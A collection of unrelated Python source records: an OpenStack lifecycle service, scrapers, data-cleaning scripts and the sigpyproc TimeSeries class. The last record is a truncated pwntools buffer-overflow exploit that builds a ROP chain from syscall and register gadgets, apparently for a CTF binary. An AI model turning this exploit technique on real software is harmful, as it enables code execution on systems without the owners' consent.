config.ALLOW_FROM_ADDRESSES\n app.smtp_host = config.SMTP_HOST\n app.return_address = config.SMTP_RETURN_ADDRESS\n app.should_clean_up = config.SHOULD_CLEAN_UP\n app.should_respond = config.SHOULD_RESPOND\n app.workspace = config.WORKSPACE_DIR\n for name, (cmd_class, cmd_config) in config.COMMANDS.items():\n cmd = cmd_class()\n cmd.set_config(cmd_config, WORKSPACE_DIR=config.WORKSPACE_DIR, FROM_ADDRESS=config.FROM_ADDRESS)\n app.add_command(name, cmd)\n\n\ndef setup_logging(config):\n logging.basicConfig(filename=config.LOG_FILE, level=config.LOG_LEVEL, format=config.LOG_FORMAT)\n logging.info('Log opened')\n\n\ndef main():\n parser = argparse.ArgumentParser(description='process email message as an offline assistant')\n parser.add_argument('--settings', type=str, help='name of the local settings module', default='local_conf.py')\n args = parser.parse_args()\n config = SourceFileLoader('local_conf', args.settings).load_module()\n setup_logging(config)\n app = CaryApp()\n try:\n configure_cary(app, config)\n msg = sys.stdin.read()\n app.process_message(msg)\n except:\n logging.exception('Serious error on initialization/processing')\n\n\nif __name__ == '__main__':\n main()","sub_path":"pycfiles/caryocar-0.0.1-py3-none-any/__main__.cpython-33.py","file_name":"__main__.cpython-33.py","file_ext":"py","file_size_in_byte":1738,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"281495502","text":"class Skill:\n def __init__(self, activationWords, handler, name):\n self.activationWords = activationWords\n self.handler = handler\n if not name.endswith(\"_skill\"):\n raise Exception(\"\\n\\nWrong skill name! Must end with '_skill'\")\n self.name = name\n\n def executeHandler(self, *args):\n return self.handler(args)\n\n def export(self):\n filename = self.name + \".daskill\"\n\n try:\n import dill\n except:\n import os\n os.system(\"python3 -m pip install dill\")\n os.system(\"python -m pip install dill\")\n import dill\n\n with open(filename, \"wb\") as file:\n dill.dump(self, file)\n print(f\"Successfully saved skill {self.name} in the following file: {filename}\")\n","sub_path":"Skill.py","file_name":"Skill.py","file_ext":"py","file_size_in_byte":802,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"179411259","text":"import discord\n\nfrom data_handler import User\n\nversion = \"v2.0.0\"\ninvite = \"https://discord.gg/DpxkY3x\"\n\n\ndef is_manager(ctx):\n role = discord.utils.get(ctx.guild.roles, name=\"Manager\")\n if role in ctx.author.roles:\n return True\n","sub_path":"utils/check.py","file_name":"check.py","file_ext":"py","file_size_in_byte":242,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"50978973","text":"\"\"\"\n# Copyright 2021 21CN Corporation Limited\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"\n\n# -*- coding: utf-8 -*-\n\nimport json\nimport os\nimport threading\nimport uuid\nimport zipfile\n\nfrom heatclient.common import template_utils\nfrom heatclient.exc import HTTPNotFound\nfrom pony.orm import db_session, commit\n\nimport utils\nfrom core import openstack_utils\nfrom core.csar.pkg import get_hot_yaml_path, CsarPkg\nfrom core.log import logger\nfrom core.models import AppInsMapper, InstantiateRequest, UploadCfgRequest, UploadPackageRequest, BaseRequest\nfrom internal.lcmservice import lcmservice_pb2_grpc\nfrom internal.lcmservice.lcmservice_pb2 import TerminateResponse, \\\n QueryResponse, UploadCfgResponse, \\\n RemoveCfgResponse, DeletePackageResponse, UploadPackageResponse, \\\n WorkloadEventsResponse\n\nLOG = logger\n\n\ndef start_check_stack_status(app_instance_id):\n \"\"\"\n start_check_stack_status\n Args:\n app_instance_id:\n \"\"\"\n thread_timer = threading.Timer(5, check_stack_status, [app_instance_id])\n thread_timer.start()\n\n\n@db_session\ndef check_stack_status(app_instance_id):\n \"\"\"\n check_stack_status\n Args:\n app_instance_id:\n \"\"\"\n app_ins_mapper = AppInsMapper.get(app_instance_id=app_instance_id)\n if not app_ins_mapper:\n LOG.debug('app ins: %s db record not found', app_instance_id)\n return\n heat = openstack_utils.create_heat_client(app_ins_mapper.host_ip)\n stack_resp = heat.stacks.get(app_ins_mapper.stack_id)\n if stack_resp is None and app_ins_mapper.operational_status == 'Terminating':\n app_ins_mapper.delete()\n LOG.debug('finish terminate app ins %s', app_instance_id)\n return\n if stack_resp.status == 'COMPLETE' or stack_resp.status == 'FAILED':\n LOG.debug('app ins: %s, stack_status: %s, reason: %s',\n app_instance_id,\n stack_resp.stack_status,\n stack_resp.stack_status_reason)\n if stack_resp.action == 'CREATE' and stack_resp.stack_status == 'CREATE_COMPLETE':\n app_ins_mapper.operational_status = utils.INSTANTIATED\n app_ins_mapper.operation_info = stack_resp.stack_status_reason\n LOG.debug('finish instantiate app ins %s', app_instance_id)\n elif stack_resp.action == 'DELETE' and stack_resp.stack_status == 'DELETE_COMPLETE':\n app_ins_mapper.delete()\n LOG.debug('finish terminate app ins %s', app_instance_id)\n else:\n app_ins_mapper.operation_info = stack_resp.stack_status_reason\n app_ins_mapper.operational_status = utils.FAILURE\n LOG.debug('failed action %s app ins %s', stack_resp.action, app_instance_id)\n else:\n LOG.debug('app ins %s status not updated, waite next...')\n start_check_stack_status(app_instance_id)\n\n\ndef validate_input_params(param):\n \"\"\"\n check_stack_status\n Args:\n param:\n Returns:\n host_ip\n \"\"\"\n access_token = param.access_token\n host_ip = param.host_ip\n LOG.debug('param hostIp: %s', host_ip)\n LOG.debug('param accessToken: %s', access_token)\n if not utils.validate_access_token(access_token):\n return None\n if not utils.validate_ipv4_address(host_ip):\n return None\n return host_ip\n\n\ndef _get_output_data(output_list, heat, stack_id):\n \"\"\"\n 获取output数据\n \"\"\"\n response = {\n 'code': 200,\n 'msg': 'ok',\n 'data': []\n }\n for item in output_list['outputs']:\n output = heat.stacks.output_show(stack_id, item['output_key'])\n output_value = output['output']['output_value']\n item = {\n 'vmId': output_value['vmId'],\n 'vncUrl': output_value['vncUrl'],\n 'networks': []\n }\n if 'networks' in output_value:\n for net_name, ip_data in output_value['networks'].items():\n if utils.validate_uuid(net_name):\n continue\n network = {\n 'name': net_name,\n 'ip': ip_data[0]['addr']\n }\n item['networks'].append(network)\n response['data'].append(item)\n return response\n\n\nclass AppLcmService(lcmservice_pb2_grpc.AppLCMServicer):\n \"\"\"\n AppLcmService\n \"\"\"\n def uploadPackage(self, request_iterator, context):\n \"\"\"\n 上传app包\n :param request_iterator:\n :param context:\n :return:\n \"\"\"\n LOG.info('receive upload package msg...')\n res = UploadPackageResponse(status=utils.FAILURE)\n\n parameters = UploadPackageRequest(request_iterator)\n\n host_ip = validate_input_params(parameters)\n if host_ip is None:\n parameters.delete_tmp()\n return res\n\n app_package_id = parameters.app_package_id\n if app_package_id is None:\n LOG.debug('appPackageId is required')\n parameters.delete_tmp()\n return res\n app_package_path = utils.APP_PACKAGE_DIR + '/' + host_ip + '/' + parameters.app_package_id\n if utils.exists_path(app_package_path):\n LOG.debug('app package exist')\n parameters.delete_tmp()\n return res\n utils.create_dir(app_package_path)\n try:\n LOG.debug('unzip package')\n with zipfile.ZipFile(parameters.tmp_package_file_path) as zip_file:\n namelist = zip_file.namelist()\n for file in namelist:\n zip_file.extract(file, app_package_path)\n pkg = CsarPkg(app_package_path)\n pkg.translate()\n res.status = utils.SUCCESS\n except Exception as exception:\n LOG.error(exception, exc_info=True)\n utils.delete_dir(app_package_path)\n finally:\n parameters.delete_tmp()\n return res\n\n def deletePackage(self, request, context):\n \"\"\"\n 删除app包\n :param request:\n :param context:\n :return:\n \"\"\"\n LOG.info('receive delete package msg...')\n res = DeletePackageResponse(status=utils.FAILURE)\n\n host_ip = validate_input_params(BaseRequest(request))\n if host_ip is None:\n return res\n\n app_package_id = request.appPackageId\n if not app_package_id:\n return res\n\n app_package_path = utils.APP_PACKAGE_DIR + '/' + host_ip + '/' + app_package_id\n utils.delete_dir(app_package_path)\n\n res.status = utils.SUCCESS\n return res\n\n @db_session\n def instantiate(self, request, context):\n \"\"\"\n app 实例化\n :param request:\n :param context:\n :return:\n \"\"\"\n LOG.info('receive instantiate msg...')\n res = TerminateResponse(status=utils.FAILURE)\n\n parameter = InstantiateRequest(request)\n\n LOG.debug('校验access token, host ip')\n host_ip = validate_input_params(parameter)\n if host_ip is None:\n return res\n\n LOG.debug('获取实例ID')\n app_instance_id = parameter.app_instance_id\n if app_instance_id is None:\n return res\n\n LOG.debug('查询数据库是否存在相同记录')\n app_ins_mapper = AppInsMapper.get(app_instance_id=app_instance_id)\n if app_ins_mapper is not None:\n LOG.info('app ins %s exist', app_instance_id)\n return res\n\n LOG.debug('读取包的hot文件')\n hot_yaml_path = get_hot_yaml_path(parameter.app_package_path)\n if hot_yaml_path is None:\n return res\n\n LOG.debug('构建heat参数')\n tpl_files, template = template_utils.get_template_contents(template_file=hot_yaml_path)\n fields = {\n 'stack_name': 'eg-' + ''.join(str(uuid.uuid4()).split('-'))[0:8],\n 'template': template,\n 'files': dict(list(tpl_files.items()))\n }\n LOG.debug('init heat client')\n heat = openstack_utils.create_heat_client(host_ip)\n try:\n LOG.debug('发送创建stack请求')\n stack_resp = heat.stacks.create(**fields)\n except Exception as exception:\n LOG.error(exception, exc_info=True)\n return res\n AppInsMapper(app_instance_id=app_instance_id,\n host_ip=host_ip,\n stack_id=stack_resp['stack']['id'],\n operational_status=utils.INSTANTIATING)\n LOG.debug('更新数据库')\n commit()\n\n LOG.debug('开始更新状态定时任务')\n start_check_stack_status(app_instance_id=app_instance_id)\n\n res.status = utils.SUCCESS\n LOG.debug('消息处理完成')\n return res\n\n @db_session\n def terminate(self, request, context):\n \"\"\"\n 销毁实例\n :param request:\n :param context:\n :return:\n \"\"\"\n LOG.info('receive terminate msg...')\n res = TerminateResponse(status=utils.FAILURE)\n\n LOG.debug('校验token, host ip')\n host_ip = validate_input_params(BaseRequest(request))\n if host_ip is None:\n return res\n\n LOG.debug('获取实例ID')\n app_instance_id = request.appInstanceId\n if app_instance_id is None:\n return res\n\n LOG.debug('查询数据库')\n app_ins_mapper = AppInsMapper.get(app_instance_id=app_instance_id)\n if app_ins_mapper is None:\n res.status = utils.SUCCESS\n return res\n\n LOG.debug('初始化openstack客户端')\n heat = openstack_utils.create_heat_client(host_ip)\n try:\n LOG.debug('发送删除请求')\n heat.stacks.delete(app_ins_mapper.stack_id)\n except HTTPNotFound:\n LOG.debug('stack不存在')\n except Exception as exception:\n LOG.error(exception, exc_info=True)\n return res\n\n app_ins_mapper.operational_status = utils.TERMINATING\n LOG.debug('更新数据库状态')\n commit()\n\n LOG.debug('开始状态更新定时任务')\n start_check_stack_status(app_instance_id=app_instance_id)\n\n res.status = utils.SUCCESS\n LOG.debug('处理请求完成')\n return res\n\n @db_session\n def query(self, request, context):\n \"\"\"\n 实例信息查询\n :param request:\n :param context:\n :return:\n \"\"\"\n LOG.info('receive query msg...')\n res = QueryResponse(response='{\"code\": 500, \"msg\": \"server error\"}')\n\n host_ip = validate_input_params(BaseRequest(request))\n if host_ip is None:\n res.response = '{\"code\":400}'\n return res\n\n app_instance_id = request.appInstanceId\n if app_instance_id is None:\n res.response = '{\"code\":400}'\n return res\n\n app_ins_mapper = AppInsMapper.get(app_instance_id=app_instance_id)\n if app_ins_mapper is None:\n res.response = '{\"code\":404}'\n return res\n\n heat = openstack_utils.create_heat_client(host_ip)\n output_list = heat.stacks.output_list(app_ins_mapper.stack_id)\n\n response = _get_output_data(output_list, heat, app_ins_mapper.stack_id)\n\n res.response = json.dumps(response)\n return res\n\n @db_session\n def workloadEvents(self, request, context):\n \"\"\"\n 工作负载事件查询\n :param request:\n :param context:\n :return:\n \"\"\"\n LOG.info('receive workload describe msg...')\n res = WorkloadEventsResponse(response='{\"code\":500}')\n\n host_ip = validate_input_params(BaseRequest(request))\n if host_ip is None:\n return res\n\n app_instance_id = request.appInstanceId\n if app_instance_id is None:\n return res\n\n app_ins_mapper = AppInsMapper.get(app_instance_id=app_instance_id)\n if app_ins_mapper is None:\n LOG.debug('app实例 %s 不存在', app_instance_id)\n res.response = '{\"code\":404}'\n return res\n\n heat = openstack_utils.create_heat_client(host_ip)\n\n events = heat.events.list(stack_id=app_ins_mapper.stack_id)\n vm_describe_info = {}\n for event in events:\n if event.resource_name in vm_describe_info:\n vm_describe_info[event.resource_name]['events'].append({\n 'eventTime': event.event_time,\n 'resourceStatus': event.resource_status,\n 'resourceStatusReason': event.resource_status_reason\n })\n else:\n vm_describe_info[event.resource_name] = {\n 'resourceName': event.resource_name,\n 'logicalResourceId': event.logical_resource_id,\n 'physicalResourceId': event.physical_resource_id,\n 'events': [\n {\n 'eventTime': event.event_time,\n 'resourceStatus': event.resource_status,\n 'resourceStatusReason': event.resource_status_reason\n }\n ]\n }\n response_data = []\n for key, value in vm_describe_info.items():\n response_data.append(value)\n res.response = json.dumps(response_data)\n return res\n\n def uploadConfig(self, request_iterator, context):\n \"\"\"\n 上传openstack配置文件\n :param request_iterator: 流式传输\n :param context:\n :return:\n \"\"\"\n LOG.info('receive uploadConfig msg...')\n res = UploadCfgResponse(status=utils.FAILURE)\n\n parameter = UploadCfgRequest(request_iterator)\n\n host_ip = validate_input_params(parameter)\n if host_ip is None:\n return res\n\n config_file = parameter.config_file\n if config_file is None:\n return res\n\n config_path = utils.RC_FILE_DIR + '/' + host_ip\n\n try:\n with open(config_path, 'wb') as new_file:\n new_file.write(config_file)\n openstack_utils.set_rc(host_ip)\n openstack_utils.clear_glance_client(host_ip)\n res.status = utils.SUCCESS\n except Exception as exception:\n LOG.error(exception, exc_info=True)\n\n return res\n\n def removeConfig(self, request, context):\n \"\"\"\n 删除openstack 配置文件\n :param request: 请求体\n :param context: 上下文信息\n :return: Success/Failure\n \"\"\"\n LOG.info('receive removeConfig msg...')\n res = RemoveCfgResponse(status=utils.FAILURE)\n\n host_ip = validate_input_params(BaseRequest(request))\n if not host_ip:\n return res\n\n config_path = utils.RC_FILE_DIR + '/' + host_ip\n try:\n os.remove(config_path)\n openstack_utils.del_rc(host_ip)\n openstack_utils.clear_glance_client(host_ip)\n res.status = utils.SUCCESS\n except OSError:\n res.status = utils.SUCCESS\n except Exception as exception:\n LOG.error(exception, exc_info=True)\n return res\n\n LOG.debug('host configuration file deleted successfully')\n return res\n","sub_path":"osplugin/service/app_lcm_service.py","file_name":"app_lcm_service.py","file_ext":"py","file_size_in_byte":15752,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"169288669","text":"#!/usr/bin/python3\n\"\"\"\nAdds the State object Louisiana to the database hbtn_0e_6_usa\nArguments:\n mysql_usr - username to connect the mySQL\n mysql psw - password to connect the mySQL\n db_name - Name of the database\n https://docs.sqlalchemy.org/en/13/orm/tutorial.html\n\"\"\"\n\n\nfrom sys import argv\nfrom model_state import Base, State\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker\n\nif __name__ == \"__main__\":\n mysql_usr = argv[1]\n mysql_pswd = argv[2]\n db_name = argv[3]\n engine = create_engine('mysql+mysqldb://{}:{}@localhost:3306/{}'\n .format(mysql_usr, mysql_pswd, db_name),\n pool_pre_ping=True)\n Base.metadata.create_all(engine)\n Session = sessionmaker(bind=engine)\n session = Session()\n new_state = State(name='Louisiana')\n session.add(new_state)\n session.commit()\n print(session.query(State).filter_by(name=\"Louisiana\").first().id)\n","sub_path":"0x0F-python-object_relational_mapping/11-model_state_insert.py","file_name":"11-model_state_insert.py","file_ext":"py","file_size_in_byte":959,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"199138662","text":"# import libraries\nimport pandas as pd\nfrom flask import current_app\n\ndef clean_report(df):\n # creating timestamp field\n df['timestp_UTC']= df['image'].str.split('_')\n df['timestp_UTC'] = df['timestp_UTC'].apply(lambda x: x[0])\n df['timestp_UTC'] = pd.to_datetime(df['timestp_UTC'], unit='ms')\n # creating new field with camera's location\n df['location'] = df['image'].str.split('_')\n df['location'] = df['location'].apply(lambda x: x[1])\n df = df.replace({\n 'A26': 'Broomielaw_@_Washington_St',\n 'A27': 'Clyde_walkway_@_McAlpine',\n 'A28': 'Broomielaw_@_James_Watt_St_(cam1)',\n 'A29': 'Broomielaw_@_James_Watt_St_(cam2)',\n 'A30': 'Broomielaw_Rear_of_Casino',\n 'A31': 'Clyde_Walkway_@_Dixon_St',\n 'A32': 'Clyde_Walkway_@_Jamaica_St',\n 'A33': 'Clyde_Walkway_@_Stockwell_St',\n 'A03': 'Argyle_St_@_Oswald_St(static)',\n 'A47': 'Argyle_St_@_Oswald_St',\n 'A66': 'Sauchiehall_St_@_Pitt_St',\n 'A82': 'Argyle_St_@_Brown_St',\n 'A13':\t'Byres_Rd_@_Dowanside_St',\n 'A36':\t'Gallowgate_@_High_St(cam1)',\n 'A47Static': 'Argyle_St_@_Oswald_St(static)',\n 'A47static':\t'Argyle_St_@_Oswald_St(static)',\n 'A52':\t'Gordon_St_@_Renfield_St',\n 'A71':\t'Killermont_St_@_Royal_Concert_Hall',\n 'A92':\t'Hope_St_@_Waterloo_St',\n 'C104':\t'Glasgow_Green_Doulton_Fountain',\n 'C117':\t'Maryhill_Forth_Clyde_Canal',\n 'C129':\t'Glasgow_Green_Path',\n 'C130':\t'Glasgow_Green_Circles',\n 'C132':\t'Glasgow_Green_monument',\n 'C133':\t'Glasgow_Green_suspension_walkway',\n 'C37':\t'Maryhill_Rd_@_Shakespeare_St',\n 'C79':\t'Kelvingrove_Park_fountain',\n 'C80':\t'Kelvingrove_Park_entrance',\n 'C81':\t'Kelvingrove_Park_Kelvin_Way',\n 'C82':\t'Kelvingrove Park_overview',\n 'C86':\t'Tollcross_Park(cam1)',\n 'C90':\t'Tollcross_Park(cam2)',\n 'C91':\t'Bellahouston_Park',\n 'E69':\t'Duke_St_@_Bellgrove',\n 'G124':\t'Victoria_Rd_@_Allison_St',\n 'T628':\t'Gallowgate_@_High_St(cam2)',\n 'T63':\t'George_Sq_@_South_Hanover_St',\n 'T71':\t'Argyle_St_@_Jamaica_St'\n })\n\n # dropping useless fields\n df.drop(['timestamp', 'image'], axis=1, inplace=True)\n\n # swap fields' position\n df = df[['timestp_UTC','location','car','person', \\\n 'bicycle','motorcycle','bus','truck']]\n\n return df\n\n\ndef get_df():\n df = pd.read_csv(current_app.config['CSVFILE'])\n df = clean_report(df)\n\n return df\n\ndef get_cameras_operation(df):\n df['date'] = df['timestp_UTC'].dt.strftime('%Y-%m-%d')\n df = df[['location', 'date']]\n df = df.groupby('location')['date'].agg(['first', 'last']).reset_index()\n\n return df\n","sub_path":"avenues/df.py","file_name":"df.py","file_ext":"py","file_size_in_byte":2749,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"408453167","text":"import sys\ndef set_size_tester():\n test_set = set()\n for item in range(1000):\n print(f\"{item} items in set. size = {sys.getsizeof(test_set)}\")\n test_set.add(f\"item {item}\")\n\ndef list_size_tester():\n test_list = []\n for item in range(1000):\n print(f\"{item} items in list. size = {sys.getsizeof(test_list)}\")\n test_list.append(f\"item\")\n\nset_size_tester()\n","sub_path":"set_size.py","file_name":"set_size.py","file_ext":"py","file_size_in_byte":393,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"408654684","text":"# -*- coding: utf-8 -*-\nimport scrapy\n# from bs4 import BeautifulSoup\nfrom scrapy.selector import Selector\nfrom maoyanspiders.items import MaoyanspidersItem\n\n\nclass MoviesSpider(scrapy.Spider):\n name = 'movies'\n allowed_domains = ['maoyan.com']\n start_urls = ['https://maoyan.com/films?showType=3&offset=0']\n\n # def parse(self, response):\n # pass\n\n #爬虫启动时自动调用方法,并且只掉用一次,用于生成初始化对象(request)\n #stat_reqests()方法读取start_urls列表中的url生成request对象。发送给引擎\n def start_requests(self):\n for i in range(0,10):\n url = f'https://maoyan.com/films?showType=3&offset={i*30}'\n yield scrapy.Request(url=url, callback=self.parse)\n # 解析函数\n def parse(self, response):\n items = []\n # 打印网页的url\n print(response.url)\n\n movies = Selector(response=response).xpath('//div[@class=\"movie-hover-info\"]')\n moviecount = len(movies)\n moviebriefs = Selector(response=response).xpath('//div[@movie-hover-title movie-hover-brief\"]')\n\n for i in range(moviecount):\n\n item = MaoyanspidersItem()\n # 路径使用 / . .. 不同的含义 \n movieName = moviebriefs[i].xpath('./a/@title')\n movieType = moviebriefs[i].xpath('./a/text()')\n movieTime = movies[i].xpath('./div[@class=\"movie-hover-title\"]/text()')\n \n\n item['movieName'] = movieName\n item['movieType'] = movieType\n item['movieTime'] = movieTime\n items.append(item)\n return items","sub_path":"week01/maoyanspiders/maoyanspiders/spiders/movies.py","file_name":"movies.py","file_ext":"py","file_size_in_byte":1632,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"93100153","text":"import os\nimport numpy as np\n\nfrom sigpyproc import FoldedData\nfrom sigpyproc import FourierSeries\nfrom sigpyproc.Header import Header\nfrom sigpyproc import libSigPyProc as lib\n\n\nclass TimeSeries(np.ndarray):\n \"\"\"Class for handling pulsar/FRB data in time series.\n\n Parameters\n ----------\n input_array : :py:obj:`numpy.ndarray`\n 1 dimensional array of shape (nsamples)\n header : :class:`~sigpyproc.Header.Header`\n observational metadata\n\n Returns\n -------\n :py:obj:`numpy.ndarray`\n 1 dimensional time series with header\n \"\"\"\n\n def __new__(cls, input_array, header):\n obj = np.asarray(input_array).astype(np.float32, copy=False).view(cls)\n obj.header = header\n return obj\n\n def __array_finalize__(self, obj):\n if obj is None:\n return\n self.header = getattr(obj, 'header', None)\n\n def fold(self, period, accel=0, nbins=50, nints=32):\n \"\"\"Fold time series into discrete phase and subintegration bins.\n\n Parameters\n ----------\n period : float\n period in seconds to fold with\n accel : float, optional\n The acceleration to fold the time series, by default 0\n nbins : int, optional\n number of phase bins in output, by default 50\n nints : int, optional\n number of subintegrations in output, by default 32\n\n Returns\n -------\n :class:`~sigpyproc.FoldedData.FoldedData`\n data cube containing the folded data\n\n Raises\n ------\n ValueError\n If ``nbins * nints`` is too large for length of the data.\n \"\"\"\n if self.size // (nbins * nints) < 10:\n raise ValueError(\"nbins x nints is too large for length of data\")\n fold_ar = np.zeros(nbins * nints, dtype=\"float64\")\n count_ar = np.zeros(nbins * nints, dtype=\"int32\")\n lib.foldTim(\n self,\n fold_ar,\n count_ar,\n self.header.tsamp,\n period,\n accel,\n self.size,\n nbins,\n nints,\n )\n fold_ar /= count_ar\n fold_ar = fold_ar.reshape(nints, 1, nbins)\n return FoldedData.FoldedData(\n fold_ar, self.header.newHeader(), period, self.header.refdm, accel\n )\n\n def rFFT(self):\n \"\"\"Perform 1-D real to complex forward FFT using FFTW3.\n\n Returns\n -------\n :class:`~sigpyproc.FourierSeries.FourierSeries`\n output of One-Dimensional DFTs of Real Data\n \"\"\"\n if self.size % 2 == 0:\n fftsize = self.size\n else:\n fftsize = self.size - 1\n fft_ar = lib.rfft(self, fftsize)\n return FourierSeries.FourierSeries(fft_ar, self.header.newHeader())\n\n def runningMean(self, window=10001):\n \"\"\"Filter time series with a running mean.\n\n Parameters\n ----------\n window : int, optional\n width in bins of running mean filter, by default 10001\n\n Returns\n -------\n :class:`~sigpyproc.TimeSeries.TimeSeries`\n filtered time series\n\n Raises\n ------\n RuntimeError\n If window size < 1\n\n Notes\n -----\n Window edges will be dealt by reflecting about the edges of the time series.\n For more robust implemetation, use :py:obj:`scipy.ndimage.uniform_filter1d`.\n \"\"\"\n if window < 1:\n raise RuntimeError('incorrect window size')\n tim_ar = lib.runningMean(self, window, self.size)\n return tim_ar.view(TimeSeries)\n\n def runningMedian(self, window=10001):\n \"\"\"Filter time series with a running median.\n\n Parameters\n ----------\n window : int, optional\n width in bins of running median filter, by default 10001\n\n Returns\n -------\n :class:`~sigpyproc.TimeSeries.TimeSeries`\n filtered time series\n\n Notes\n -----\n Window edges will be dealt with only at the start of the time series.\n \"\"\"\n tim_ar = lib.runningMedian(self, window, self.size)\n return tim_ar.view(TimeSeries)\n\n def applyBoxcar(self, width):\n \"\"\"Apply a boxcar filter to the time series.\n\n Parameters\n ----------\n width : int\n width in bins of filter\n\n Returns\n -------\n :class:`~sigpyproc.TimeSeries.TimeSeries`\n filtered time series\n\n Notes\n -----\n Time series returned is of size nsamples-width with width/2\n removed from either end.\n \"\"\"\n tim_ar = lib.runBoxcar(self, width, self.size)\n return tim_ar.view(TimeSeries)\n\n def downsample(self, factor):\n \"\"\"Downsample the time series.\n\n Parameters\n ----------\n factor : int\n factor by which time series will be downsampled\n\n Returns\n -------\n :class:`~sigpyproc.TimeSeries.TimeSeries`\n downsampled time series\n\n Notes\n -----\n Returned time series is of size nsamples//factor\n \"\"\"\n if factor == 1:\n return self\n newLen = self.size // factor\n tim_ar = lib.downsampleTim(self, factor, newLen)\n return TimeSeries(\n tim_ar, self.header.newHeader({'tsamp': self.header.tsamp * factor})\n )\n\n def pad(self, npad):\n \"\"\"Pad a time series with mean valued data.\n\n Parameters\n ----------\n npad : int\n number of padding points\n\n Returns\n -------\n :class:`~sigpyproc.TimeSeries.TimeSeries`\n padded time series\n \"\"\"\n new_ar = np.hstack((self, self.mean() * np.ones(npad)))\n return TimeSeries(new_ar, self.header.newHeader())\n\n def resample(self, accel, jerk=0):\n \"\"\"Perform time domain resampling to remove acceleration and jerk.\n\n Parameters\n ----------\n accel : float\n The acceleration to remove from the time series\n jerk : float, optional\n The jerk/jolt to remove from the time series, by default 0\n\n Returns\n -------\n :class:`~sigpyproc.TimeSeries.TimeSeries`\n resampled time series\n \"\"\"\n if accel > 0:\n new_size = self.size - 1\n else:\n new_size = self.size\n out_ar = np.zeros(new_size, dtype=\"float32\")\n lib.resample(self, out_ar, new_size, accel, self.header.tsamp)\n\n new_header = self.header.newHeader({\"nsamples\": out_ar.size, \"accel\": accel})\n return TimeSeries(out_ar, new_header)\n\n def correlate(self, other):\n \"\"\"Cross correlate with another time series of the same length.\n\n Parameters\n ----------\n other : array to correlate with\n :class:`numpy.ndarray`\n\n Returns\n -------\n :class:`sigpyproc.TimeSeries.TimeSeries`\n time series containing the correlation\n \"\"\"\n if not isinstance(other, TimeSeries):\n try:\n other = TimeSeries(other, self.header.newHeader())\n except Exception:\n raise Exception(\"Could not convert argument to TimeSeries instance\")\n return (self.rFFT() * other.rFFT()).iFFT()\n\n def toDat(self, basename):\n \"\"\"Write time series in presto ``.dat`` format.\n\n Parameters\n ----------\n basename : str\n file basename for output ``.dat`` and ``.inf`` files\n\n Returns\n -------\n tuple of str\n ``.dat`` file name and ``.inf`` file name\n\n Notes\n -----\n Method also writes a corresponding .inf file from the header data\n \"\"\"\n self.header.makeInf(outfile=f\"{basename}.inf\")\n with open(f\"{basename}.dat\", \"w+\") as datfile:\n if self.size % 2 == 0:\n self.tofile(datfile)\n else:\n self[:-1].tofile(datfile)\n return f\"{basename}.dat\", f\"{basename}.inf\"\n\n def toFile(self, filename=None):\n \"\"\"Write time series in sigproc format.\n\n Parameters\n ----------\n filename : str, optional\n name of file to write to, by default ``basename.tim``\n\n Returns\n -------\n str\n output file name\n \"\"\"\n if filename is None:\n filename = f\"{self.header.basename}.tim\"\n with self.header.prepOutfile(filename, nbits=32) as outfile:\n outfile.cwrite(self)\n return filename\n\n @classmethod\n def readDat(cls, filename, inf=None):\n \"\"\"Read a presto format ``.dat`` file.\n\n Parameters\n ----------\n filename : str\n the name of the ``.dat`` file to read\n inf : str, optional\n the name of the corresponding ``.inf`` file, by default None\n\n Returns\n -------\n :class:`~sigpyproc.TimeSeries.TimeSeries`\n a new TimeSeries object\n\n Raises\n ------\n IOError\n If no ``.inf`` file found in the same directory of ``.dat`` file.\n\n Notes\n -----\n If inf=None, then the associated .inf file must be in the same directory.\n \"\"\"\n datfile = os.path.realpath(filename)\n basename, ext = os.path.splitext(datfile)\n if inf is None:\n inf = f\"{basename}.inf\"\n if not os.path.isfile(inf):\n raise IOError(\"No corresponding .inf file found\")\n header = Header.parseInfHeader(inf)\n data = np.fromfile(filename, dtype=np.float32)\n header[\"basename\"] = basename\n header[\"inf\"] = inf\n header[\"filename\"] = filename\n header[\"nsamples\"] = data.size\n return cls(data, header)\n\n @classmethod\n def readTim(cls, filename):\n \"\"\"Read a sigproc format ``.tim`` file.\n\n Parameters\n ----------\n filename : str\n the name of the ``.tim`` file to read\n\n Returns\n -------\n :class:`~sigpyproc.TimeSeries.TimeSeries`\n a new TimeSeries object\n \"\"\"\n header = Header.parseSigprocHeader(filename)\n hdrlen = header[\"hdrlen\"]\n data = np.fromfile(filename, dtype=header[\"dtype\"], offset=hdrlen)\n data = data.astype(np.float32, copy=False)\n return cls(data, header)\n","sub_path":"sigpyproc/TimeSeries.py","file_name":"TimeSeries.py","file_ext":"py","file_size_in_byte":10362,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"276583134","text":"from pwn import *\nimport time\n\n\naddr_gets = 0x4004ee\naddr_syscall = 0x40255e\n\naddr_pop_rdi = 0x000000000040141c\naddr_pop_rsi_r15 = 0x000000000040141a\naddr_pop_rdx = 0x00000000004023f5\naddr_pop_rax = 0x0000000000400121\n\naddr_bss = 0x604240\naddr_buf = addr_bss + 0x200\n\n\npayload = b''\n# payload += b'A' * 0x108\npayload += b'A' * 0x108\n\npayload += p64(addr_pop_rdi)\npayload += p64(addr_buf)\npayload += 